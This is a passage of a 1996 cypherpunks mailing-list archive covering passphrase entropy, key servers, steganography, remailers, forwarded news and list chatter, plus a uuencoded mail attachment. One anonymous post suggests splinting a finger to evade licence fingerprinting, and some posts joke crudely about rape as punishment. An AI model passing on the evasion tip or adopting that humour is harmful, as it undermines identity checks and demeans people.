wrote: > > On Wed, 18 Sep 1996, Gary Howland wrote: > > > If you really want this functionality, a nicer solution is to use your > > passphrase as a seed to the key generator - that way you never need > > So much for entropy. If you can actually remember your seed generator, it > can't be that random, can it? I don't know about you, but I can certainly remember enough bits to be secure. The fact that passphrases are so widely used goes to show that I'm not the only one that can do this. [Darth Vader voice:] "Don't overestimate the entropy of your passphrase" Let's see, 128 bits (say) of info, mapped comfortably into the upper case letters and digits (5 bits/char), means a string of about 26 *really random* characters. An example might be "KQI8CH49SCK3PKWNA37AYV9QJ5". If that just rolls off your toungue, you have my respect (and I have pi memorized to 110 decimal places!) This assumes a full 5 bits of entropy/character. If your passphrase is more coherent (i.e., less entropy) than that, like "Strange kr0ws fly 1azily at MIDnight", it almost certainly contains _far_ less entropy than that. 128 bits of truly arbitrary (random) info is a fair amount of information to comfortably remember. Mind you, I think a properly constructed passphrase (like the one above) is pretty darn resistant against any sort of reasonable dictionary or quasi-brute force attack. But I don't think it's got anywhere near, say, 128 bits of entropy. Probably closer to half that. Anyway, the point I was making that this method would be preferable to a "secret key server". My proposal would offer the same security, would it not? (The secret key server is arguably less secure than generating keys from passphrases, since key generation takes longer than IDEA decryption - however, they are still of the same order). Using a pass phrase to seed key generation (or more directly, using the hash of a pass phrase as a key) does not increase the entropy, of course. Not sure if this is relevant to your claim, as I've sort of lost track of the original context! Best regards, Gary Tunny ====================================================================== James A. Tunnicliffe | WWWeb: http://www.inference.com/~tunny Inference Corporation | PGP Fingerprint: CA 23 E2 F3 AC 2D 0C 77 tunny at Inference.com | 36 07 D9 33 3D 32 53 9C ====================================================================== begin 600 WINMAIL.DAT M>)\^(BH6`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <` M& ```$E032Y-:6-R;W-O9G0 at 36%I;"Y.;W1E`#$(`06 `P`.````S <)`!,` M#P`"`"<`! `K`0$@@ ,`#@```,P'"0`3``\``@`H``0`+ $!"8 !`"$```!# M14-"1C at T1#)$,3)$,#$Q.3,P-C P04$P,$$U1C8P1 `L!P$-@ 0``@````(` M`@`!!( !`!<```!213H at 4')I=F%T92!K97D@`' ``0```!,```!02!S M97)V97(```(!<0`!````&P````&[ID2E\4WXRWL2+1'0DP8`J@"E]@T``$$D MNP`#`"X```````,`!A"7!9D@`P`'$-D'```>``@0`0```&4```!'05)92$]7 M3$%.1%--5% Z1T%264!365-414U)0U-#3TU74D]413I&15-414U!0$%,0T]2 M0T].0T]21$E!0T%74D]413I/3E=%1"PQ.%-%4#$Y.38L1T%264A/5TQ!3D17 M4D]4``````,`$! ``````P`1$ `````"`0D0`0```-0'``#0!P``GPT``$Q: M1G7 ,,# _P`*`0\"%0*D`^0%ZP*#`% 3`U0"`&-H"L!S973N, at 8`!L,"@S(# MQ@<3`H/&,P/%`@!P2<`,S8H1QEB# $I MAF;F7P>0';%A0 = !:$L`=IN!:%D!S L`&$MA0J%5CXOEC3 3P. at 5PF +"@@ M,3@&47 UX#DY/C8UT"H*,^\X!C3 26:T('D(8" C0 = ;"HP9G<`< 5 =&@$ M`#(@=1DS0'1I`B '0&ET>5$"($DE15))P#I3+I\*CPN1$O(M%5=U6T0*P!$Z8"!6802!('9O03O1.ET@ M(D1+DV__0?$R40=P0)!)(CTP1%55P%$+@#^5WG5A at 07 ,\ ] M(6P2`!VPKQ'@.Y W83. 9V S-4\3^B\1LBEA03FP!C$_(41P#0N 9UT23#0R M-B J^SFE290J14 1P4619!%0D<)!`Z!E>&%M"U ], ",] ZL#G0(&4471)$5?]E M@,08RHP02%-240#`&I!(OM'XCN0 M; 1@;4%-B#,A3;+E!"!?40!R7WD;>?A0D=]?YUTA1'!T4'R!Q86MFHD$#.F,'@.\Z8 1P+8 ( M8&PW<$D1C0&N9D!QD!(\X6%7=2)0,=^-$3_SE_%!\6QB32HPB8+_?> 8 at 9\$ M;=&8`C_18( '@']0)#M3GP-7=7V!55%*?2CW4,*A#X/3 UT!]0G;0],/\1P!]A9N*V M2S[S0 %@L$G _P>155*LX8^B7$LUT%TA!:#W"' 1\%"13E5A<\!2<0:0[SI4 M.H$C0&/0=CHC//!&L_^7P MP2>$^\540;U&/)I?1_SI!:-&)0+)%<5%DL#LA M?K.Y::!T(4J,F7^:CT(R4?LYD2LA9*R at 2HPJ`K-_M(_]RA)4.L".\,GO"Y$: MD3%Z7CW.S\_?T._1_SW,E2#^2J0A$V%$P,Q"*] G`*.!&2UP('PUD-4P96(Z M at V\@`D!P.B\O=]80GBYA`7A2.^ L`B]^1;#OS&@Y(-9F&X%RG,"MM=4!X%!' M4"!&9J$$D!3 %V*1U8 M<$.O<#(S($I%$B!&VQ!!0V=@1&0@,-N at -S?3)M=# M0/_8%RP"U.'5`=Y/+7#&4-O at L#<@1#G?<-L0,]O0RC,2(#7;$#E#S)72'[_B M;^-_Y(_3!\R5(F$`YN! `#D`\#\O1G:FNP$#`/$_"00```(!1P`!````,@`` M`&,]55,[83T at .W ]26YF97)E;F-E.VP]3$%.1%)5+3DV,#DQ.3(R,#(S.5HM M,34U,C8````"`?D_`0```$H`````````W*= R,!"$!JTN0@`*R_A@@$````` M````+T\]24Y&15)%3D-%+T]5/4Y/5D%43R]#3CU214-)4$E%3E13+T-./515 M3DY9````'@#X/P$````5````2F%M97, at 02X@5'5N;FEC;&EF9F4``````@'[ M/P$```!*`````````-RG0,C 0A :M+D(`"LOX8(!`````````"]//4E.1D52 M14Y#12]/53U.3U9!5$\O0TX]4D5#25!)14Y44R]#3CU454Y.60```!X`^C\! M````%0```$IA;65S($$N(%1U;FYI8VQI9F9E`````$ `!S!@L\PQ1J:[`4 ` M"## A(]&=J:[`0,`#33]/P```@$4- $````0````5)2AP"E_$!NEAP@`*RHE M%QX`/0`!````!0```%)%.B `````"P`I```````+`",```````(!?P`!```` M40```#QC/553)6$]7R5P/4EN9F5R96YC925L/4Q!3D1252TY-C Y,3DR,C R M,SE:+3$U-3(V0&QA;F1R=2YN;W9A=&\N:6YF97)E;F-E,BYC;VT^``````>; ` end From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 19:21:10 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 10:21:10 +0800 Subject: Commentary on news coverage of attacks Message-ID: <01I9O1AWQ91S8Y4ZFQ@mbcl.rutgers.edu> I thought it was interesting to note what got deleted - namely cryptographic (signature) protection against such attacks - and what got included - namely faked addresses. You can get the original NYT version via JYA. -Allen > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > CONCERN AT RASH OF ATTACKS BY HACKERS ON INTERNET SITES > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Financial Times > SAN FRANCISCO (Sep 19, 1996 00:23 a.m. EDT) -- A rash of hacker > attacks on commercial Internet sites -- including one in which the > services of Panix, a New York-based Internet access provider, were > seriously disrupted -- has raised new concerns about the security and > reliability of the worldwide computer network. [...] > Attacks have been "isolated incidents," said Pete Solvik, > vice-president of information systems at Cisco Systems, the leading > manufacturer of routing equipment for the Internet. The company, > however, is concerned that the problem could spread, disrupting > Internet service for millions of users and effectively closing down > large commercial sites on the Internet. > With many banks and retailers now planning Internet services, the > potential for financial losses as a result of such attacks is rising. > Disruption of Internet service can also be a serious problem for the > tens of thousands of businesses that now rely on electronic mail and > sites on the World Wide Web to communicate with their partners and > customers. > The impact of a large-scale "denial-of-service attack" can be > devastating, said Solvik. Within a minute, a computer linked to the > Internet can be completely overwhelmed and it may take days before > service can be restored. [...] > Because the attacks came from fake addresses on the Internet, it was > "impossible to trace the source without a major effort on the part of > all Internet service providers between Panix and the attacking party," > said Rosen. > "The nature of the Internet, which is designed to let machines > communicate with a minimum exchange of identifying information, makes > every site on the Internet vulnerable," said Rosen. > The Federal Bureau of Investigation's New York Computer Investigations > Threat Assessment Center is understood to be investigating the attack > on Panix. Computer Emergency Response Teams, a US organization that > collates information about security and technical problems on the > Internet, are looking into the incident. [...] > Copyright © 1996 Nando.net From rah at shipwright.com Thu Sep 19 19:29:14 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 20 Sep 1996 10:29:14 +0800 Subject: It seems a million dollars in cash is illegal... Message-ID: ...in India, anyway. Yes. I know. He probably didn't *earn* it. Well, not *that* way, anyway... Cheers, Bob Hettinga --- begin forwarded text To: economist-politics at postbox.co.uk From: The Economist Subject: Politics This Week (September 13th - September 19th) Data: Thu Sep 19 17:33:56 GB 1996 Sender: Nobody Date: Thu, 19 Sep 1996 17:33:57 +0100 **************************************************************************** Welcome to Politics This Week (September 13th - September 19th) A weekly summary of the world's main events from The Economist Also available at http://www.economist.com/ **************************************************************************** Indian police arrested Sukh Ram, a former communications minister, a month after police found over $1m in cash hidden in his house. Mr Ram was arrested on his return from abroad. Information about this newsletter This is a free newsletter published by The Economist newspaper. To find out where best to direct queries to The Economist, do not reply to this message. Send a blank e-mail message to help at economist.com If you are having problems receiving this list, send an e-mail to support at postbox.co.uk To cancel your subscription, send an e-mail with the message "leave economist-politics" to newscaster at postbox.co.uk Alternatively, you can cancel your subscription (or re-subscribe at any time) by visiting http://www.economist.com/mailing/ Copyright The Economist Newspaper Limited --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From bdurham at metronet.com Thu Sep 19 19:35:55 1996 From: bdurham at metronet.com (Brian Durham) Date: Fri, 20 Sep 1996 10:35:55 +0800 Subject: undeliverable mail Message-ID: <3241DD69.1794@metronet.com> Anyone else having problems posting? I've been getting a mailbox full problem from a vaxen at mqg-smtp3.usmc.mil ... if anyone is interested, will forward error. This post may make it through ... From froomkin at law.miami.edu Thu Sep 19 19:48:23 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Fri, 20 Sep 1996 10:48:23 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <43kcuD64w165w@bwalk.dm.com> Message-ID: See http://www.law.miami.edu/~froomkin/articles/trustedno.htm#ENDBACK31 for another use of the term... **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From tcmay at got.net Thu Sep 19 19:50:52 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 10:50:52 +0800 Subject: unimbibe cypherpunks@toad.com Message-ID: At 11:24 AM 9/19/96, Steve Dyson wrote: >unscribe cypherpunks at toad.com > Please unimbibe me, too! I tried "unscrive," "unsuscrive," and "unscribe," and even "unsuckscribe," so now I'm trying "unimbibe." Help, I'm trapped on this list and I can't unscrive from it! --Tim (Of course, had I kept any of the many instructions that have been posted, or the instructions I got when I got signed up, I would've known that the correct way to "unsubscribe" is to send a message to "majordomo at toad.com" with the body message of "unsubscribe cypherpunks".) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frogfarm at yakko.cs.wmich.edu Thu Sep 19 19:51:04 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 20 Sep 1996 10:51:04 +0800 Subject: (fwd) Strange telephone call Message-ID: <199609192333.TAA25736@yakko.cs.wmich.edu> >From: vandy at avana.net (Vandy Terre) Newsgroups: alt.folklore.urban,alt.pagan,alt.revenge,alt.snowmobiles,ga.forsale,ga.general,misc.consumers.frugal-living,misc.rural Subject: Strange telephone call Date: Wed, 18 Sep 1996 14:27:05 GMT Organization: Tanglewood Farm Lines: 59 Message-ID: <323ffe3d.188173 at news.avana.net> This message is being cross posted to several groups that I read in an effort to find an answer to my questions. Please email replies, not all posts make it to my server. If you must answer on the net, please trim headers. Okay, this is the story. I just received a strange telephone call. My caller ID system shows only 'OUT_OF_AREA-----000-----'. The female voice claimed to be taking a survey for the Department of Defense and that she was acting as a representative of my government. She did not say US Government or State Government, just 'your government'. When I said that there was no way for me to verify she was what she claimed, she gave me a business name, supervisor's name and an 800 telephone number. She claimed this survey had to do with a Department of Defense program named 'YATS' and told me that if my household did not qualify, then our telephone number would be removed from the calling list. She then ask the same question three different ways. The question was 'Is there anyone in your household between the ages of 16 and 24?'. When I said no for the third time, she said we did not qualify and hung up. So here are my questions. Was this a legitimate call? The government should already know exactly how many people are in my household. It is on my tax forms every year and many other places. Why would any government office or representative of a government office be making cold calls to unknown telephone numbers for any kind of survey? Who or what is 'Westat'? This is the name of the company this woman supposedly represented. The telephone number given to me is 1-800-638-8778. The same woman answered it as called me. Seems like a company doing a survey for the government would have more than one employee. Her supervisor's name is Chris Martin. Is she Chris Martin? In a single person office, I guess you would be your own supervisor. The woman never gave her personal name. This survey was supposed to be for the Department of Defense for a program named 'YATS'. What is YATS? My biggest question is, Is this a new face on an old scam? Instead of posing as the local fire department looking for donations, are the scam-artist now posing as the government? What a way to case a home in preparation for theft or running yet another scam of questionable legality. Yes, I am a very suspicious person. I have seen too many scams being run. Thank you for taking the time to read this. Please answer by email. Please trim headers if answering on the net. Thank you. Any significantly advanced scam vandy at avana.net is indistinguishable from religion. Georgia, USA -- frogfarm at yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual. "Would I had phrases that are not known, utterances that are strange, in new language that has not been used, free from repetition, not an utterance which has grown stale, which men of old have spoken." From frogfarm at yakko.cs.wmich.edu Thu Sep 19 19:52:10 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 20 Sep 1996 10:52:10 +0800 Subject: (fwd) Re: Strange telephone call Message-ID: <199609192334.TAA25744@yakko.cs.wmich.edu> >From: MS Newsgroups: misc.consumers.frugal-living Subject: Re: Strange telephone call Date: Thu, 19 Sep 1996 18:19:12 -0400 Organization: NSTN Lines: 159 Message-ID: <3241C6DF.17CE at fox.nstn.ca> X-No-Archive: Yes I did an Altavista search on Westat with these results: 1.) Westat's Internet site 2.) A document from the DEFENCE LOGISTICS AGENCY on YATS I guess that phone call wasn't a scam after all... BTW, whenever in doubt, just run your Internet browser and use the search engines. You'll be amazed at how much info you can get by just typing in a word or two. MS 1.) Quoted from Westat's home page (http://www.westat.com/) Westat An Employee-Owned Research Corporation Welcome to Westat Westat is an employee-owned corporation headquartered in the greater Washington, DC, metropolitan area. We conduct surveys and provide statistical research and related services to the agencies of the U.S. Government and a broad range of institutional and business clients. Our diverse staff of 800 enables us to assemble project teams to meet the challenges of complex research projects. With a more than 30-year history of technical and managerial excellence, Westat has emerged as one of the foremost statistical research and evaluation organizations in the United States. Additional Information about Westat: Research Capabilities Program Areas Employee Ownership How to Contact Westat Opportunities for Systems Professionals Statistical Software (WesVarPC) Last Modified: May 14, 1996 Site comments or problems: Webmaster at Westat.com Please note: Pages at this site have been designed for viewing with Netscape 1.1X Navigator using monitors displaying at least 256 colors. Use of a different HTML viewer or a display with less than 256 colors may result in the loss of page layout information and/or poor quality images. 2.) Document on 'YATS' (the following lines as they appeared on Altavista's search) No Title May 1, 1996. DEFENSE LOGISTICS AGENCY. Environmental Research Institute of Michigan, Ann Arbor, Michigan, is being awarded an estimated $44,425,774... http://www.fedmarket.com/blue5-1.html - size 8K - 29 May 96 *********** Westat, Incorporated, Rockville, Maryland, is being awarded a $1,630,647 increment as part of a $15,155,183 firm fixed price contract for a Communications Enlistment Decisions - Youth Attitude Tracking Study (YATS). This effort requires the contractor to administer half-hour computer assisted telephone interviews (CATIs) in an annual survey of 10,000 16-24 year-old men and women that evaluates their attitudes toward the military. The purpose of this survey is to provide the Armed Services with market data that enables them to more accurately target advertising and recruiting activities to appeal to potential recruit populations. The project includes design and selection of the sample, modification of the survey instrument, questionnaire administration, compilation and weighting of the data, production of preliminary and public use data tapes and preparation of documentation and analytical reports. Work will be performed in Rockville, Maryland, and is expected to be completed by July 31, 2001. Contract funds will not expire at the end of the current fiscal year. There were 45 bids solicited on January 26, 1996, and two bids received. The contracting activity is the Defense Supply Service-Washington, Washington, D.C. (DASW01-96-C-0041). ************* -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Tell your friends 'n neighbors you read this on the evil pornographic Internet "Where one burns books, one will also burn people eventually." -Heinrich Heine People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos. From dougr at skypoint-gw.globelle.com Thu Sep 19 20:07:28 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Fri, 20 Sep 1996 11:07:28 +0800 Subject: Morality, Responsibility, Technology. In-Reply-To: <199609191327.XAA00418@suburbia.net> Message-ID: >> The term "defect" is therefore entirely out of line. We have no business >> placing judgements from our own limited material value sets onto >> something which has the definite potential of affecting all future >> generations of Humanity. It's none of our business. > >The problem however, is that artificial selection maybe the only way to >select beneficial attributes at all. What is presently being selected >for in western societies is all the factors that lead to a lack of >practice or belief in birth control. I'll let the reader think for a >moment on just what those are. Perhaps we can also somehow test for and >abolish the "Catholic" gene? You offer the humorous example of Catholicism. But this is really a deceptively clear example of exactly what I was saying: that we aren't even close to having any kind of objective faculties which would be required to competently make these kinds of decisions. Catholicism: is it Nature or is it Nurture? This example would effectively equivalent to just one ideology gaining "leverage" over another, and using the technology of genetics to gain this leverage. I'll finish this up below. I don't want to miss your real counterpoint behind the example. What I hear you really saying is that you can open your eyes, and look around at the processes of natural selection in action, and you can see all kinds of social forces at work, many of which would appear, given our value set, to be functioning to the disadvantage of the species. But again, this proves even more brutally how deeply our lack of objectivity runs when we try to evaluate such matters. We tend to value traits such as industriousness, and yet we see some social welfare programs which effectively reward the absence of this quality. This example, as well as your own example, are issues which we can't even reach a consensus on socially. And since *we* can't even deal with such things socially, how could we ever presume to claim the moral competence to address them genetically? For example, our western society is less than 9,000 years old. As participants we assume our western society is "good." But a traditional Australian Aborigine, coming from a 35,000 to 60,000 year old society, might have a completely different perspective. He might view our European lifestyle as one very big mistake, and a recent one at that. Maybe, just maybe, we have culturally taken a very large step away from what our inherent natures really are. If this were true you might expect to see a larger amount of latent grey matter evolved into all of our skulls than any of us really use. But then, this *is* the case. So as we are, nobody really knows what the effect of widespread crypto will be, any more than we could have predicted the impact of cars or transistors or nuclear fission. The future is literally in your hands. Douglas B. Renner dougr at usa.globelle.com From alano at teleport.com Thu Sep 19 20:15:52 1996 From: alano at teleport.com (Alan Olsen) Date: Fri, 20 Sep 1996 11:15:52 +0800 Subject: [Noise] Do unto others... Message-ID: <3.0b16.32.19960919171257.00ca49e8@mail.teleport.com> At 05:26 AM 9/19/96 +0000, attila wrote: >Mike Farrell, actor and longtime opponent of the death penalty: > > "We don't rape rapists, > we don't burn arsonists, > why should we kill killers?" > > well, come to thing of it, why don't we let a bull rape a rapist? > > or burn an arsonist at the stake? > > seems fair to me. maybe even sell tickets to pay for the cost. I guess that begs the question of what to do with politicians... "Squeal like a pig! Squeal! Squeal!" "There will be no crisco today!" - Caligula --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From alano at teleport.com Thu Sep 19 20:25:06 1996 From: alano at teleport.com (Alan Olsen) Date: Fri, 20 Sep 1996 11:25:06 +0800 Subject: unimbibe cypherpunks@toad.com Message-ID: <3.0b16.32.19960919181104.00ca68d8@mail.teleport.com> At 05:37 PM 9/19/96 -0700, you wrote: >I tried "unscrive," "unsuscrive," and "unscribe," and even "unsuckscribe," >so now I'm trying "unimbibe." Try sending mail to: drummajor at toad.com with uncircumcise cypherpunks in the body of the message. --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From asgaard at Cor.sos.sll.se Thu Sep 19 20:25:09 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Fri, 20 Sep 1996 11:25:09 +0800 Subject: More proposals for European censorship In-Reply-To: <01I9O2D1BGCO8Y4ZFQ@mbcl.rutgers.edu> Message-ID: On Thu, 19 Sep 1996, E. Allen Smith forwarded: >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European >> Parliament pressed the European Union on Thursday to act to curb child >> sex and trafficking rings, saying the fight against sexual abuse of >> children must be an "absolute priority." It's probably no coincidence that the recently busted, utter horrible child-molesting ring, with obvious protection from various persons in the establishment, was centered in Belgium - that's where the EU bureaucrat nomenklatura play their power games and go to bordellos. Asgaard From westo at bssc.edu.au Thu Sep 19 21:03:58 1996 From: westo at bssc.edu.au (barina man) Date: Fri, 20 Sep 1996 12:03:58 +0800 Subject: Insider Trading - news report Message-ID: <1.5.4.32.19960920013701.0067f4e4@172.24.10.10> >Return-Path: cypherpunks-errors at toad.com >Date: Thu, 19 Sep 1996 15:46 EDT >From: "E. Allen Smith" >Subject: Insider Trading - news report >To: cypherpunks at toad.com >X-Envelope-to: cypherpunks at toad.com >X-VMS-To: IN%"cypherpunks at toad.com" >Sender: owner-cypherpunks at toad.com > > I'd be curious as to the comments of Black Unicorn and others on >that legal finding - it does appear to make things at least a bit better >in this area... including making it difficult to claim that insider >information shouldn't be transmitted on the Net. Incidentally, I find >AP's calling insider trading "fraud" rather biased. > -Allen > >> _________________________________________________________________ >> Direct Media >> _________________________________________________________________ >> INSIDER TRADING NEVER WENT AWAY >> __________________________________________________________________________ >> Copyright © 1996 Nando.net >> Copyright © 1996 The Associated Press > >> WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous >> acts in the financial fraudster's playbook, insider trading, remains >> at record levels, despite a decade of steady crackdowns by regulators. > >[...] > >> The SEC brought one of its more unusual insider trading cases on >> Monday, when it sued the unnamed account holders in a Swiss and >> Bahamian accounts with insider trading ahead of The Gillette Co.'s >> merger proposal for Duracell International. > >[...] > >> One disturbing development for regulators is a recent decision by the >> 8th U.S. Circuit Court of Appeals that struck down one of the SEC's >> main enforcement tools in insider trading cases. > >> The court, which covers several Midwestern states, rejected the >> so-called "misappropriation theory" in insider trading cases, which is >> used to nab people trading on inside information who don't owe a >> fiduciary duty to the company's shareholders. The court also rejected >> an SEC rule used to snare insider trading in tender offers. > >> The 8th Circuit decision came in August in a Justice Department case >> against Minneapolis attorney James H. O'Hagan, who was charged with >> insider trading during the 1988 takeover bid of Pillsbury Co. by Grand >> Metropolitan PLC. SEC General Counsel Richard Walker has asked the >> appeals court for a rehearing on the matter. > >> While the 8th Circuit decision represents a setback for the SEC, the >> agency usually brings its cases in the New York and Chicago areas, >> where the federal courts acknowledge these insider trading rules. > >> Regulators say these enforcement tools are important because insider >> trading follows few patterns. In an analysis of 35 cases brought in >> 1995 that solely dealt with insider trading, Gerlach said 20 involved >> trading ahead of mergers, three ahead of other positive corporate >> announcements and six ahead of bad corporate news. > >> He described 16 of the cases as "classic insider trading" involving an >> executive, company director or employee who traded on confidential, >> market sensitive information or tipped friends about it. Among the >> remaining cases, four involved trading by securities brokers or other >> industry officials, four involved law firm employees and one, an >> employee at an outside accounting firm. > >> Investigators at the Nasdaq Stock Market's market surveillance unit >> refer a significant number of insider trading cases to the SEC. Halley >> Milligan, who heads a team of nine insider trading investigators at >> Nasdaq, said the market has made 73 referrals on suspected insider >> trading to the SEC so far in 1996, which is on par with last year, >> when 107 cases were referred to the agency. > >> Nasdaq, like major stock markets, uses sophisticated computer >> technology to sniff out illegal trading. The Nasdaq system is called >> SWAT, or Stock Watch Automatic Tracking, which scans news databases >> after detecting any unusual trading. > >[...] > >> Copyright © 1996 Nando.net > >unsubsribe please From nobody at cypherpunks.ca Thu Sep 19 21:12:50 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Fri, 20 Sep 1996 12:12:50 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <199609200149.SAA23613@abraham.cs.berkeley.edu> tcmay at got.net (Timothy C. May) writes: > So, just what it is _your_ method of dealing with this? While it is noble > to talk about fighting the system, just how do you go about doing it > yourself? How about just putting your finger in a cast or splint before you renew your license? From DMiskell at envirolink.org Thu Sep 19 21:57:20 1996 From: DMiskell at envirolink.org (Daniel Miskell) Date: Fri, 20 Sep 1996 12:57:20 +0800 Subject: All Bets Off Message-ID: <199609200230.WAA05165@envirolink.org> I don't doubt this, honestly. After all, novels alone don't earn the kind of guided tours, information, and assistance he's received on many counts. It had the feel of military connections, but I wasn't about to doubt it, I've allways this truely was the Land Of Opertunity. In any event, he deserves such treatment. He's an excellent author, and does justice to the people he portrays, despite the disclaimer that none of the characters are made to represent anyone living or dead. Daniel. From dthorn at gte.net Thu Sep 19 22:52:35 1996 From: dthorn at gte.net (Dale Thorn) Date: Fri, 20 Sep 1996 13:52:35 +0800 Subject: Stego inside encryption In-Reply-To: Message-ID: <32421412.2C7C@gte.net> Mullen Patrick wrote: > To take this one step further, has anyone tried to ever use this > method as an encryption method? You could hide data in a stream of > random bits, using position as the encryption method. Obviously, the > data would not be stored in packets; rather as single bits strewn > throughout the stream. Even ASCII characters could be hidden in such > a system very well, as the possibility of > choosing the correct 8 bits (extended char set) from the data stream > when any combination has equal potential of being the correct sequence > would be extremely difficult. Error checking/correcting code could > even be used. > Using this system, the placement algorithm would be the focus of > attack. If an algorithm which has a sufficiently random placement was > used, extracting the correct bits would be difficult. Another way to > increase the security would be to hide the correct message inside a > bitstream created by using the same method on other similar messages. > (Hiding a real message inside bogus messages. Hmm...Which one's real?)..... some text deleted here.... This sounds like exactly what I've been saying. You could paste the message inside or adjacent to the non-text data (and you could bit-pad the text before doing so), then move all the bits around, etc. I'm not sure what was meant by "even ASCII characters could be hidden...", since just before you encrypt, everything's ASCII in some sense or another. From froomkin at law.miami.edu Thu Sep 19 23:24:07 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Fri, 20 Sep 1996 14:24:07 +0800 Subject: LEOs running anon servers? In-Reply-To: Message-ID: This claim was made at a symposium held at Harvard by a sometime lecturer at the National Defense college. He later denied it. Since lots of other things he said in the same lecture were plainly false (more likely his ignorance than a clever attempt to spread FUD), I wouldn't lose sleep over it. Anyway, who cares -- you just use encryption and chaining and all is well. See http://www.law.miami.edu/~froomkin/articles/oceanno.htm#xtocid583110 for more info. On Tue, 10 Sep 1996, Andrew Fabbro wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > There > > are a number of anonymous remailers out in cyberspace, but it has been > > stated by a knowledgeable source that a number of them are being operated > > by law enforcement agencies (presumably to troll for criminal activity). A > > > Can someone verify/discredit/comment on this statement? Who is the > knowledgeable source? > > > > > Andrew Fabbro [afabbro at umich.edu] http://www-personal.umich.edu/~afabbro/ > PGP mail preferred; finger afabbro at us.itd.umich.edu for key > "A good marketing organization listens to its customers...WE HEAR YOU!" > - the National Security Agency > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: PGP Signed with PineSign 2.0 > > iQCVAwUBMjWOx7oWkgjb6N6dAQEK4QP9ETvg03QMpYw81FmXNl0vxbkYLk9wph74 > /291PduW3+BkN17iKBBns6v//HrnZJIttMqG+7wLzrX+zt1OpspGJLjJm03P/m68 > CQ8L2K3stOyYvSB/S63M449eC+QX9iNEFpLD/QNOv7JM4ZVgQvEvUH6STaxF+Ez4 > ClypqKualSA= > =L3rM > -----END PGP SIGNATURE----- > **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From stewarts at ix.netcom.com Thu Sep 19 23:25:02 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 20 Sep 1996 14:25:02 +0800 Subject: Private key server Message-ID: <199609200400.VAA04898@dfw-ix1.ix.netcom.com> At 11:46 AM 9/18/96 -0400, csteel at teir.com (Chris Steel) wrote about the problem of getting his public and private keys to various machines around his company, and would like some sort of secret-key-ring server to make it easier to download them (and presumably to avoid leaving them on the disks of shared machines for longer than necessary.) This is, of course, semi-dangerous, for a couple of reasons 1) Limiting access to your secret keyring file reduces the probability of a brute-force cracker attack against your keyring - if your password is "foo", then anybody who has your keyring can probably find that out quickly if they hack a pgp-keyring-cracker. 2) Your keyring has, in cleartext, the identities of the different keys on it. If you only use one id, and it's well-known, that doesn't expose you particularly, but if you're using multiple nyms, anyone who has your file can connect them by just looking at the printable parts of the file. However, assuming you've decided to do it anyway :-), what are your options? You could use a networked file system such as NFS or Netware or the Evil Microsoft NETBIOS-based filesystems, and take advantage of their protections. Since they don't ship encrypted data, any eavesdropper can find them anyway, but they won't be able to just grab the file off the net. You'd be better off, however, using a secure web server, like Apache-SSL, and only providing https: access to the page plus passwords plus address-based restrictions to try to make it accessible only to you and not eavesdroppable. Also, you can encrypt the copy of the secret keyring you distribute using a secret key you can remember. But don't do it :-) # Thanks; Bill # Bill Stewart, +1-415-442-2215 